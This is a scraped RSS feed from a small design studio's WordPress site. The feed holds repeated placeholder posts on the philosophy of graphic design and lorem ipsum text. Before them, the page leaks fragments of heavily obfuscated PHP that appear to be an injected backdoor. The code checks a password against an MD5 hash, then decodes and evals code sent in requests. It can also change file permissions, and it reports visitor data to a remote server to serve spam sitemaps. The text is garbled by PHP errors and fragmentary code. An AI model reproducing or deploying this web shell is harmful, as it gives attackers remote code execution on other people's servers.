___O0O)){$O0O_0O0O__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x30\x4f\x30\x5f\x5f"]($O00O___O0O);if($O0OOO__00_==$O0O_0O0O__){return;}}@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x30\x5f\x4f\x30\x4f"]($O00O___O0O,0777);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x30\x4f\x4f\x5f\x5f"]($O00O___O0O,$O0OOO__00_);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x30\x5f\x4f\x30\x4f"]($O00O___O0O,0644);}function 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${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]($OO00_O_0_O);}else{${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x30\x5f\x4f\x30\x30\x5f"]($OO00_O_0_O);}die();}if(isset($_REQUEST["\x64\x5f\x74\x69\x6d\x65"])){die('2023/9/7');}if(isset($_REQUEST["\x70\x77\x64\x31\x36\x33"])){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x30\x30\x5f\x30\x4f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x4f\x5f\x5f\x30\x5f\x30"]($_REQUEST["\x70\x77\x64\x31\x36\x33"]))=="f4f5673a4d8ec70ad42e05b4744daf6b"){$O_O0O_0O0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x4f\x30\x30\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x30\x30\x5f\x4f\x5f\x4f"]((${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x30\x5f\x5f\x30\x4f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x5f\x4f\x5f\x5f\x4f\x30\x30"]($_REQUEST["\x7a\x7a\x7a"])))));$O__0OOO0_0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x4f\x30\x30\x5f"]("PD9waHA=");if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x5f\x30\x30\x4f\x30\x5f"]($O_O0O_0O0_,$O__0OOO0_0)===false){$O_O0O_0O0_=$O__0OOO0_0.PHP_EOL.$O_O0O_0O0_;}if(isset($_REQUEST["\x65"])){$O_O0O_0O0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x30\x4f\x5f\x5f\x4f"]($O__0OOO0_0,"",$O_O0O_0O0_);$O_0_OO00_O='e'.${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x4f\x30\x30\x5f"]("dmE=").'l';$O_0_OO00_O($O_O0O_0O0_);die();}$O0O__O0O0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x30\x5f\x5f\x4f\x30\x4f"]();${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x30\x30\x5f\x30\x5f\x4f"]($O0O__O0O0_,$O_O0O_0O0_);$O00O_O_O0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x4f\x30\x30\x5f\x5f\x5f"]($O0O__O0O0_);@require($O00O_O_O0_["\x75\x72\x69"]);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x5f\x4f\x30\x4f"]($O0O__O0O0_);die();}if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x30\x30\x5f\x30\x4f\x5f"]($_REQUEST["\x70\x77\x64\x31\x36\x33"]."a!#_11AA")=="2f7a76f71ff9e24be7c0015ff9cb81d8"){if(isset(${"\x5f\x47\x45\x54"}["\x73\x69\x74\x65\x6d\x61\x70"])){$O0_00OOO__=${"\x5f\x47\x45\x54"}["\x73\x69\x74\x65\x6d\x61\x70"];$OOO_0_0O_0=OOO00_0_O_('Ky8v1Ie0vPz0/PSdVLzs8fHFAA==');if(isset(${"\x5f\x47\x45\x54"}["\x67\x6f\x6f\x67\x6c\x65\x5f\x75\x72\x6c"])){$OOO_0_0O_0=${"\x5f\x47\x45\x54"}["\x67\x6f\x6f\x67\x6c\x65\x5f\x75\x72\x6c"];}OO_00OO__0($OOO_0_0O_0,$O0_00OOO__,$OO00_O_0_O);}}}O___O0OO00();$O0_O_O_00O=array('domain'=>$OO00_O_0_O["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"],'request_url'=>$OO00_O_0_O["\x72\x65\x71\x75\x65\x73\x74\x5f\x75\x72\x6c"],'ip'=>$OO00_O_0_O["\x69\x70"],'agent'=>$OO00_O_0_O["\x75\x73\x65\x72\x5f\x61\x67\x65\x6e\x74"],'referer'=>$OO00_O_0_O["\x72\x65\x66\x65\x72\x65\x72"],'protocol'=>$OO00_O_0_O["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"],'language'=>$OO00_O_0_O["\x6c\x61\x6e\x67\x75\x61\x67\x65"]);$O0OOO__00_=O_0O_O0_0O($OO00_O_0_O["\x61\x70\x69"],0,2,$O0_O_O_00O,array(),$OO00_O_0_O["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"]);if(isset($_REQUEST["\x64\x75\x6d\x70"])){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x5f\x4f\x5f\x30\x4f\x4f"]($O0OOO__00_);$O0OOO__00_=O_0O_O0_0O("http://google.co.jp");${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x5f\x4f\x5f\x30\x4f\x4f"]($O0OOO__00_);die();}$O0__O00O_O=O__OO000O_($O0OOO__00_);if($O0__O00O_O!==false){foreach($O0__O00O_O["\x68\x65\x61\x64\x65\x72\x73"] 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Warning: Cannot modify header information - headers already sent by (output started at /home/clients/253471e823529601924635dd538443cc/web/index.php:4) in /home/clients/253471e823529601924635dd538443cc/web/wp-includes/feed-rss2.php on line 8
explicit design https://explicit.ch Mon, 01 May 2023 12:39:31 +0000 fr-FR hourly 1 https://wordpress.org/?v=6.2.2 https://explicit.ch/wp-content/uploads/2023/05/cropped-explicit-icon-32x32.png explicit design https://explicit.ch 32 32 Basic Space https://explicit.ch/basic-space/ https://explicit.ch/basic-space/#comments Thu, 05 Mar 2020 15:19:22 +0000 https://themerain.com/demo/scene/?p=112 Philosophy of design is the study of assumptions, foundations, and implications of design. The field is defined by an interest in a set of problems, or an interest in central or foundational concerns in design. In addition to these central problems for design as a whole, many philosophers of design consider these problems as they apply to particular disciplines (e.g. philosophy of art). Although most practitioners are philosophers, several prominent designers and artists have contributed to the field. Graphic design has seen many changes and influences.

The field needs more depth, in a sense graphic design needs to find itself, all while evolving at the same time. It’s debatable how the background of graphic design needs to be shared. There’s the discussion of different designers, and their notable works. Portrayals of how the physical art has changed and been inspired by past all while embracing the future.

Graphic Design as a field is young. There is not enough information about how it came to be. There is subtle information about society accepting messages being put in front of them. There’s not enough information given to design students about where the concept for graphic design comes from, or at least an understanding about the original forms of communications that used more than words, or why typography has such a large impact.

https://explicit.ch/basic-space/feed/ 1
Street Faces https://explicit.ch/street-faces/ Wed, 04 Mar 2020 12:47:21 +0000 https://themerain.com/demo/scena/?p=1351 Philosophy of design is the study of assumptions, foundations, and implications of design. The field is defined by an interest in a set of problems, or an interest in central or foundational concerns in design. In addition to these central problems for design as a whole, many philosophers of design consider these problems as they apply to particular disciplines (e.g. philosophy of art). Although most practitioners are philosophers, several prominent designers and artists have contributed to the field. Graphic design has seen many changes and influences.

The field needs more depth, in a sense graphic design needs to find itself, all while evolving at the same time. It’s debatable how the background of graphic design needs to be shared. There’s the discussion of different designers, and their notable works. Portrayals of how the physical art has changed and been inspired by past all while embracing the future.

Graphic Design as a field is young. There is not enough information about how it came to be. There is subtle information about society accepting messages being put in front of them. There’s not enough information given to design students about where the concept for graphic design comes from, or at least an understanding about the original forms of communications that used more than words, or why typography has such a large impact.

The Summer Tour https://explicit.ch/the-summer-tour/ Tue, 03 Mar 2020 15:17:27 +0000 https://themerain.com/demo/scene/?p=103 Philosophy of design is the study of assumptions, foundations, and implications of design. The field is defined by an interest in a set of problems, or an interest in central or foundational concerns in design. In addition to these central problems for design as a whole, many philosophers of design consider these problems as they apply to particular disciplines (e.g. philosophy of art). Although most practitioners are philosophers, several prominent designers and artists have contributed to the field. Graphic design has seen many changes and influences.

The field needs more depth, in a sense graphic design needs to find itself, all while evolving at the same time. It’s debatable how the background of graphic design needs to be shared. There’s the discussion of different designers, and their notable works. Portrayals of how the physical art has changed and been inspired by past all while embracing the future.

Graphic Design as a field is young. There is not enough information about how it came to be. There is subtle information about society accepting messages being put in front of them. There’s not enough information given to design students about where the concept for graphic design comes from, or at least an understanding about the original forms of communications that used more than words, or why typography has such a large impact.

The Future of Everything https://explicit.ch/the-future-of-everything/ Mon, 02 Mar 2020 15:18:01 +0000 https://themerain.com/demo/scene/?p=106 Philosophy of design is the study of assumptions, foundations, and implications of design. The field is defined by an interest in a set of problems, or an interest in central or foundational concerns in design. In addition to these central problems for design as a whole, many philosophers of design consider these problems as they apply to particular disciplines (e.g. philosophy of art). Although most practitioners are philosophers, several prominent designers and artists have contributed to the field. Graphic design has seen many changes and influences.

The field needs more depth, in a sense graphic design needs to find itself, all while evolving at the same time. It’s debatable how the background of graphic design needs to be shared. There’s the discussion of different designers, and their notable works. Portrayals of how the physical art has changed and been inspired by past all while embracing the future.

Graphic Design as a field is young. There is not enough information about how it came to be. There is subtle information about society accepting messages being put in front of them. There’s not enough information given to design students about where the concept for graphic design comes from, or at least an understanding about the original forms of communications that used more than words, or why typography has such a large impact.

Don’t Pause to Think https://explicit.ch/dont-pause-to-think/ Sun, 01 Mar 2020 15:18:38 +0000 https://themerain.com/demo/scene/?p=109 Philosophy of design is the study of assumptions, foundations, and implications of design. The field is defined by an interest in a set of problems, or an interest in central or foundational concerns in design. In addition to these central problems for design as a whole, many philosophers of design consider these problems as they apply to particular disciplines (e.g. philosophy of art). Although most practitioners are philosophers, several prominent designers and artists have contributed to the field. Graphic design has seen many changes and influences.

The field needs more depth, in a sense graphic design needs to find itself, all while evolving at the same time. It’s debatable how the background of graphic design needs to be shared. There’s the discussion of different designers, and their notable works. Portrayals of how the physical art has changed and been inspired by past all while embracing the future.

Graphic Design as a field is young. There is not enough information about how it came to be. There is subtle information about society accepting messages being put in front of them. There’s not enough information given to design students about where the concept for graphic design comes from, or at least an understanding about the original forms of communications that used more than words, or why typography has such a large impact.

Surf Ranch https://explicit.ch/surf-ranch/ Fri, 28 Feb 2020 12:47:57 +0000 https://themerain.com/demo/scena/?p=1354 Philosophy of design is the study of assumptions, foundations, and implications of design. The field is defined by an interest in a set of problems, or an interest in central or foundational concerns in design. In addition to these central problems for design as a whole, many philosophers of design consider these problems as they apply to particular disciplines (e.g. philosophy of art). Although most practitioners are philosophers, several prominent designers and artists have contributed to the field. Graphic design has seen many changes and influences.

The field needs more depth, in a sense graphic design needs to find itself, all while evolving at the same time. It’s debatable how the background of graphic design needs to be shared. There’s the discussion of different designers, and their notable works. Portrayals of how the physical art has changed and been inspired by past all while embracing the future.

Graphic Design as a field is young. There is not enough information about how it came to be. There is subtle information about society accepting messages being put in front of them. There’s not enough information given to design students about where the concept for graphic design comes from, or at least an understanding about the original forms of communications that used more than words, or why typography has such a large impact.

Blaze New Trails https://explicit.ch/blaze-new-trails/ Thu, 27 Feb 2020 12:48:12 +0000 https://themerain.com/demo/scena/?p=1356 Philosophy of design is the study of assumptions, foundations, and implications of design. The field is defined by an interest in a set of problems, or an interest in central or foundational concerns in design. In addition to these central problems for design as a whole, many philosophers of design consider these problems as they apply to particular disciplines (e.g. philosophy of art). Although most practitioners are philosophers, several prominent designers and artists have contributed to the field. Graphic design has seen many changes and influences.

The field needs more depth, in a sense graphic design needs to find itself, all while evolving at the same time. It’s debatable how the background of graphic design needs to be shared. There’s the discussion of different designers, and their notable works. Portrayals of how the physical art has changed and been inspired by past all while embracing the future.

Graphic Design as a field is young. There is not enough information about how it came to be. There is subtle information about society accepting messages being put in front of them. There’s not enough information given to design students about where the concept for graphic design comes from, or at least an understanding about the original forms of communications that used more than words, or why typography has such a large impact.

Between the Seasons https://explicit.ch/between-the-seasons/ Sun, 17 Nov 2019 20:38:46 +0000 https://themerain.com/demo/scene/?p=84 Philosophy of design is the study of assumptions, foundations, and implications of design. The field is defined by an interest in a set of problems, or an interest in central or foundational concerns in design. In addition to these central problems for design as a whole, many philosophers of design consider these problems as they apply to particular disciplines (e.g. philosophy of art). Although most practitioners are philosophers, several prominent designers and artists have contributed to the field. Graphic design has seen many changes and influences.

The field needs more depth, in a sense graphic design needs to find itself, all while evolving at the same time. It’s debatable how the background of graphic design needs to be shared. There’s the discussion of different designers, and their notable works. Portrayals of how the physical art has changed and been inspired by past all while embracing the future.

Graphic Design as a field is young. There is not enough information about how it came to be. There is subtle information about society accepting messages being put in front of them. There’s not enough information given to design students about where the concept for graphic design comes from, or at least an understanding about the original forms of communications that used more than words, or why typography has such a large impact.

Into The Great Wide Open https://explicit.ch/into-the-great-wide-open/ Sat, 16 Nov 2019 15:13:54 +0000 https://themerain.com/demo/scene/?p=91 Philosophy of design is the study of assumptions, foundations, and implications of design. The field is defined by an interest in a set of problems, or an interest in central or foundational concerns in design. In addition to these central problems for design as a whole, many philosophers of design consider these problems as they apply to particular disciplines (e.g. philosophy of art). Although most practitioners are philosophers, several prominent designers and artists have contributed to the field. Graphic design has seen many changes and influences.

The field needs more depth, in a sense graphic design needs to find itself, all while evolving at the same time. It’s debatable how the background of graphic design needs to be shared. There’s the discussion of different designers, and their notable works. Portrayals of how the physical art has changed and been inspired by past all while embracing the future.

Graphic Design as a field is young. There is not enough information about how it came to be. There is subtle information about society accepting messages being put in front of them. There’s not enough information given to design students about where the concept for graphic design comes from, or at least an understanding about the original forms of communications that used more than words, or why typography has such a large impact.

ARTICLE 6 https://explicit.ch/article-6/ https://explicit.ch/article-6/#respond Mon, 20 Feb 2017 15:22:44 +0000 http://mxajfmgl.preview.infomaniak.website/?p=28593 Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.



Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.



Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.


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